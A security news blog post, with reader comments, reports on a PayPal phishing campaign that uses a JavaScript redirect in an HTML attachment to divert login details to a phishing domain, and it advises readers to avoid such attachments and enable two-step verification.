Think hovering your mouse over the URL will save you? Think again!

Phishers using JavaScript redirect to steal PayPal credentials

David bisson
David Bisson

Regular readers are familiar with our ongoing coverage of phishing attacks.

Recently, we reported on an Apple ID SMS-based phishing scam, and described how tax-related phishing attacks surged by 400 percent this year.


The continued success of these and other phishing campaigns reveal a persistent deficit of security awareness among users. Indeed, as we shared in an article earlier in 2016, Tripwire found that more than half (52 percent) of respondents for a survey conducted at RSA were “not confident” in their ability to spot a phishing attack.

Sign up to our free newsletter.
Security news, advice, and tips.

That’s troubling news. And as attacks continue to grow in sophistication, it’ll only get harder to spot a phish.

Case in point, phishers are now using a hidden JavaScript redirect method to steal unsuspecting PayPal users’ login information.

On Monday, UK malware researcher @dvk01uk came across the phishing campaign.

Peter Arntz of Malwarebytes explains that fraudsters in these particular attacks are using JavaScript to send users to a legitimate PayPal site while sending their credentials to a different domain that hosts a phishing page:

“The javascript runs as soon as the page (HTML attachment) is loaded and intercepts all posts to and diverts them to the actual phishing page to accept all your details, if you are unwise enough to fall for this trick.”

This sophisticated technique negates a common anti-phishing tactic: hovering over a URL to confirm it points to where you would expect it to point.

Fortunately, users can protect themselves against this phishing technique, though for how long remains to be seen. The malware researcher @dvk01uk expands upon this point in a blog post:

“The only saving grace with this particular phishing attack is that the phishing page is a HTML page / form that they tell you to open on your computer and not a link to a website. The advice we always give to NOT open any attachments to emails and definitely do not fill in html form attachments should protect you. But once a phisher puts this onto a website with a plausible & believable URL, then all bets are off and it will be almost impossible to detect the phish. This is very worrying.”

Fortunately, PayPal offers users the ability to enable two-step verification, which will help protect their accounts even in the event someone compromises users’ passwords.

David Bisson is an infosec news junkie and security journalist. He works as Contributing Editor for Graham Cluley Security News and Associate Editor for Tripwire's "The State of Security" blog.

4 comments on “Think hovering your mouse over the URL will save you? Think again!”

  1. drsolly

    I've been using a non-html mail client since 1995.

  2. dqfozzie

    PayPal are their own worst enemy when it comes to phishing. They proclaim they are anti-phishing but have links on their 'Your … statement is available' emails that look suspicious. I check them out because I'm a security professional but the average person either tires of this process or doesn't know how to to begin with. Their users have no confidence that they are safe. Best practice is to give no link at all and get the user to go to a known safe bookmark or type it in from scratch. I've emailed them. Guess how much response I got:-(

  3. vooboobolly

    Paypal 2FA is not available in all countries! Why not?

  4. graphicequaliser

    I always login to the site by typing the url, check the SSL padlock before I login, and then login to see a statement or whatever. I have the motto, "If something is running on your computer that is not part of the OS, then you really ought to know what it does and why it is running." Also, "Don't install something because you've been prompted to. Only install stuff you want." That, and MJ Registry Watcher have kept me safe for many years!

What do you think? Leave a comment

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.